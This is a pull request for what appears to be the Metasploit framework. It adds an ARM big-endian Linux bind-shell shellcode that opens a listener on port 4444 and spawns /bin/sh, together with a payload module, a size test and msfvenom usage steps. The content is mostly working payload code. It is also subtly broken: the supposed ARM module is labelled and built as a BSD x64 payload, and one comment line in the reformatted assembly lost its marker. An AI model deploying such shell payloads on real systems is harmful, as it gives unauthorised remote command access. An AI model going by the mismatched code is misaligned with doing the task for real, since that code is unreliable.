### PR TITLE
Linux ARM big endian ipv4 bind shellcode coming thru!

### DIFF
--- a/external/source/shellcode/linux/armbe/single_sock_bind.s
+++ b/external/source/shellcode/linux/armbe/single_sock_bind.s
@@ -1,0 +1,100 @@
+/*
+Linux Arm Big Endian bind_tcp ipv4 shellcode, 118 bytes
+Balazs Bucsay
+@xoreipeip | earthquake <at@> rycon <do.t> hu  
+http://rycon.hu
+port = 4444
+ip = 0.0.0.0
+*/
+
+.section .text
+	.global _start
+
+	_start:
+		.code 32
+
+		# Thumb-Mode on
+		add 	r6, pc, #1
+		bx	r6
+		.code 	16
+
+		# _socket(2,1,0)
+		sub	r2, r2, r2
+		add	r1, r2, #1
+		add	r0, r2, #2
+		lsl	r7, r1, #8
+		add	r7, r7, #0x19
+		svc	1
+		mov	r6, r0
+
+	/*
+	1  uint8_t 	sin_len
+	1 sa_family_t 	sin_family
+	2 in_port_t 	sin_port
+	4 struct in_addr 	sin_addr
+	8 char 	sin_zero [8]
+	00 02 5C11 00000000 00000000 00000000
+	5c11 => 4444
+	*/
+		# _bind()
+		mov	r2, #2
+		lsl	r2, r2, #8
+		add	r2, r2, #0x11
+		lsl	r2, r2, #8
+		add	r2, r2, #0x5C
+		sub	r3, r3, r3
+		sub	r4, r4, r4
+		sub 	r5, r5, r5
+		mov	r1, sp
+		stm	r1!, {r2-r5}
+		sub	r1, #0x10
+		mov	r2, #16
+		add	r7, r7, #1
+		svc	1
+
+		# _listen()
+		mov	r0, r6
+		sub	r1, r1, r1
+		add	r7, r7, #2
+		svc	1
+		
+		# _accept()
+		mov	r0, r6
+		sub	r2, r2, r2
+		add	r7, r7, #1
+		svc	1
+		mov	r6, r0
+
+		# _dup2()
+		sub	r1, r1, r1
+		mov	r7, #63
+		svc	1
+	
+		mov	r0, r6
+		add	r1, r1, #1
+		svc	1
+
+		mov	r0, r6
+		add	r1, r1, #1
+		svc	1
+
+		# _execve()
+		sub	r2, r2, r2
+		mov 	r0, pc
+		add 	r0, #18
+// next intstruction terminates the string beneath the code "//bin/sh"
+// in case you want to say goodbye to the null character
+//		str	r2, [r0, #8]
+		str	r2, [sp, #8]
+		str	r0, [sp, #4]
+		add 	r1, sp, #4
+		mov 	r7, #11
+		svc 	1
+
+		# _exit()
+		sub	r4, r4, r4
+		mov	r0, r4
+		mov 	r7, #1
+		svc	1
+.ascii "//bin/sh\0"
+//.ascii "//bin/sh"

--- a/external/source/shellcode/linux/armbe/single_sock_bind.s
+++ b/external/source/shellcode/linux/armbe/single_sock_bind.s
@@ -1,11 +1,30 @@
-/*
-Linux Arm Big Endian bind_tcp ipv4 shellcode, 118 bytes
-Balazs Bucsay
-@xoreipeip | earthquake <at@> rycon <do.t> hu  
-http://rycon.hu
-port = 4444
-ip = 0.0.0.0
-*/
+@@
+@
+@        Name: single_sock_bind
+@   Qualities: -
+@     Authors: Balazs Bucsay <@xoreipeip>
+@     License: MSF_LICENSE
+@ Description:
+@
+@        Implementation of a Linux bind TCP shellcode for ARM BE architecture.
+@
+@        Assemble with: 
+@          armeb-buildroot-linux-uclibcgnueabi-as -mthumb single_sock_bind.s -o shellcode.o
+@        Link with:
+@          armeb-buildroot-linux-uclibcgnueabi-ld shellcode.o -o shellcode
+@
+@ Meta-Information:
+@
+@ meta-shortname=Linux Bind TCP
+@ meta-description=Listen on a port for a connection and run a second stage
+@ meta-authors=earthquake
+@ meta-os=linux
+@ meta-arch=armbe
+@ meta-category=singles
+@ meta-connection-type=bind
+@ meta-name=bind_tcp
+@@
+
 
 .section .text
 	.global _start
@@ -13,12 +32,12 @@ ip = 0.0.0.0
 	_start:
 		.code 32
 
-		# Thumb-Mode on
+@		 Thumb-Mode on
 		add 	r6, pc, #1
 		bx	r6
 		.code 	16
 
-		# _socket(2,1,0)
+@		 _socket(2,1,0)
 		sub	r2, r2, r2
 		add	r1, r2, #1
 		add	r0, r2, #2
@@ -27,16 +46,14 @@ ip = 0.0.0.0
 		svc	1
 		mov	r6, r0
 
-	/*
-	1  uint8_t 	sin_len
-	1 sa_family_t 	sin_family
-	2 in_port_t 	sin_port
-	4 struct in_addr 	sin_addr
-	8 char 	sin_zero [8]
-	00 02 5C11 00000000 00000000 00000000
-	5c11 => 4444
-	*/
-		# _bind()
+@	1  uint8_t 	sin_len
+@	1 sa_family_t 	sin_family
+@	2 in_port_t 	sin_port
+@	4 struct in_addr 	sin_addr
+@	8 char 	sin_zero [8]
+@	00 02 5C11 00000000 00000000 00000000
+@	5c11 => 4444
+@		 _bind()
 		mov	r2, #2
 		lsl	r2, r2, #8
 		add	r2, r2, #0x11
@@ -52,20 +69,20 @@ ip = 0.0.0.0
 		add	r7, r7, #1
 		svc	1
 
-		# _listen()
+@		 _listen()
 		mov	r0, r6
 		sub	r1, r1, r1
 		add	r7, r7, #2
 		svc	1
 		
-		# _accept()
+@		 _accept()
 		mov	r0, r6
 		sub	r2, r2, r2
 		add	r7, r7, #1
 		svc	1
 		mov	r6, r0
 
-		# _dup2()
+@		 _dup2()
 		sub	r1, r1, r1
 		mov	r7, #63
 		svc	1
@@ -78,23 +95,23 @@ ip = 0.0.0.0
 		add	r1, r1, #1
 		svc	1
 
-		# _execve()
+		 _execve()
 		sub	r2, r2, r2
 		mov 	r0, pc
 		add 	r0, #18
-// next intstruction terminates the string beneath the code "//bin/sh"
-// in case you want to say goodbye to the null character
-//		str	r2, [r0, #8]
+@ next intstruction terminates the string beneath the code "//bin/sh"
+@ in case you want to say goodbye to the null character
+@		str	r2, [r0, #8]
 		str	r2, [sp, #8]
 		str	r0, [sp, #4]
 		add 	r1, sp, #4
 		mov 	r7, #11
 		svc 	1
 
-		# _exit()
+@		 _exit()
 		sub	r4, r4, r4
 		mov	r0, r4
 		mov 	r7, #1
 		svc	1
 .ascii "//bin/sh\0"
-//.ascii "//bin/sh"
+@.ascii "//bin/sh"

--- a/modules/payloads/singles/bsd/x64/shell_bind_tcp_small.rb
+++ b/modules/payloads/singles/bsd/x64/shell_bind_tcp_small.rb
@@ -44,7 +44,7 @@ module MetasploitModule
             "\x0f\x05"             +#	syscall                            #
             "\x48\x97"             +#	xchg   %rax,%rdi                   #
             "\x52"                 +#	push   %rdx                        #
-            "\xba\x00\x02\x11\x5C" +# mov edx,0x5c110200                 #
+            "\xba\x00\x02\x11\x5C" +#	mov edx,0x5c110200                 #
             "\x52"                 +#	push   %rdx                        #
             "\x48\x89\xe6"         +#	mov    %rsp,%rsi                   #
             "\x6a\x10"             +#	pushq  $0x10                       #

--- a/modules/payloads/singles/linux/armbe/shell_bind_tcp.rb
+++ b/modules/payloads/singles/linux/armbe/shell_bind_tcp.rb
@@ -1,0 +1,86 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/handler/bind_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module MetasploitModule
+
+  CachedSize = 88
+
+  include Msf::Payload::Single
+  include Msf::Payload::Bsd
+  include Msf::Sessions::CommandShellOptions
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'          => 'BSD x64 Command Shell, Bind TCP Inline',
+      'Description'   => 'Listen for a connection and spawn a command shell',
+      'Author'        => 'Balazs Bucsay @xoreipeip <balazs.bucsay[-at-]rycon[-dot-]hu>',
+      'References'    => ['URL', 'https://github.com/earthquake/shellcodes/blob/master/x86_64_bsd_bind_tcp.asm.c'],
+      'License'       => MSF_LICENSE,
+      'Platform'      => 'bsd',
+      'Arch'          => ARCH_X86_64,
+      'Handler'       => Msf::Handler::BindTcp,
+      'Session'       => Msf::Sessions::CommandShellUnix,
+      'Payload'       =>
+        {
+          'Offsets' =>
+            {
+              'LPORT'    => [ 18, 'n' ],
+            },
+          'Payload' =>
+            "\x6a\x61"             +#	pushq  $0x61                       #
+            "\x58"                 +#	pop    %rax                        #
+            "\x99"                 +#	cltd                               #
+            "\x6a\x02"             +#	pushq  $0x2                        #
+            "\x5f"                 +#	pop    %rdi                        #
+            "\x6a\x01"             +#	pushq  $0x1                        #
+            "\x5e"                 +#	pop    %rsi                        #
+            "\x0f\x05"             +#	syscall                            #
+            "\x48\x97"             +#	xchg   %rax,%rdi                   #
+            "\x52"                 +#	push   %rdx                        #
+            "\xba\x00\x02\x11\x5C" +#	mov edx,0x5c110200                 #
+            "\x52"                 +#	push   %rdx                        #
+            "\x48\x89\xe6"         +#	mov    %rsp,%rsi                   #
+            "\x6a\x10"             +#	pushq  $0x10                       #
+            "\x5a"                 +#	pop    %rdx                        #
+            "\x04\x66"             +#	add    $0x66,%al                   #
+            "\x0f\x05"             +#	syscall                            #
+            "\x48\x31\xf6"         +#	xor    %rsi,%rsi                   #
+            "\x6a\x6a"             +#	pushq  $0x6a                       #
+            "\x58"                 +#	pop    %rax                        #
+            "\x0f\x05"             +#	syscall                            #
+            "\x99"                 +#	cltd                               #
+            "\x04\x1e"             +#	add    $0x1e,%al                   #
+            "\x0f\x05"             +#	syscall                            #
+            "\x48\x89\xc7"         +#	mov    %rax,%rdi                   #
+            "\x6a\x5a"             +#	pushq  $0x5a                       #
+            "\x58"                 +#	pop    %rax                        #
+            "\x0f\x05"             +#	syscall                            #
+            "\xff\xc6"             +#	inc    %esi                        #
+            "\x04\x5a"             +#	add    $0x5a,%al                   #
+            "\x0f\x05"             +#	syscall                            #
+            "\xff\xc6"             +#	inc    %esi                        #
+            "\x04\x59"             +#	add    $0x59,%al                   #
+            "\x0f\x05"             +#	syscall                            #
+            "\x52"                 +#   push   %rdx                        #
+            "\x48\xbf\x2f\x2f"     +#   mov "//"                           #
+            "\x62\x69\x6e\x2f"     +#   "bin/sh"                           #
+            "\x73\x68"             +#   mov    $0x68732f6e69622f2f,%rdi    #
+            "\x57"                 +#	push   %rdi                        #
+            "\x48\x89\xe7"         +#	mov    %rsp,%rdi                   #
+            "\x52"                 +#	push   %rdx                        #
+            "\x57"                 +#	push   %rdi                        #
+            "\x48\x89\xe6"         +#	mov    %rsp,%rsi                   #
+            "\x04\x39"             +#	add    $0x39,%al                   #
+            "\x0f\x05"              #   syscall                            #
+        }
+      ))
+  end
+
+end

--- a/spec/modules/payloads_spec.rb
+++ b/spec/modules/payloads_spec.rb
@@ -1053,6 +1053,16 @@ RSpec.describe 'modules/payloads', :content do
                           modules_pathname: modules_pathname,
                           reference_name: 'java/shell_reverse_tcp'
   end
+ 
+ context 'linux/armbe/shell_bind_tcp' do
+    it_should_behave_like 'payload cached size is consistent',
+                          ancestor_reference_names: [
+                              'singles/linux/armbe/shell_bind_tcp'
+                          ],
+                          dynamic_size: false,
+                          modules_pathname: modules_pathname,
+                          reference_name: 'linux/armbe/shell_bind_tcp'
+  end
 
   context 'linux/armle/adduser' do
     it_should_behave_like 'payload cached size is consistent',


### PR DESCRIPTION
Two changes:
- minor minor change: old module space replaced to tab
- new single payload module: Linux ARM big endian ipv4 bind shellcode
## Verification

List the steps needed to make sure this thing works
- [x] Start `msfconsole`
- [x] `use payload/linux/armbe/shell_bind_tcp`
- [x] `info`
  OR
- [x] `msfvenom -p linux/armbe/shell_bind_tcp  --format c CMD="/bin/ls"`
